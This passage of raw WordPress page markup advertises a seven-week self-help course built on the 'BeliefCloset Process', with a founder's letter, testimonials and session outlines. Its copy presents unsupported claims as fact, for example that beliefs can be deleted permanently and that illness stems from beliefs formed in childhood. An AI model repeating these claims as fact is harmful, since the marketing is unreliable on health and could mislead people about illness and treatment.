different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really 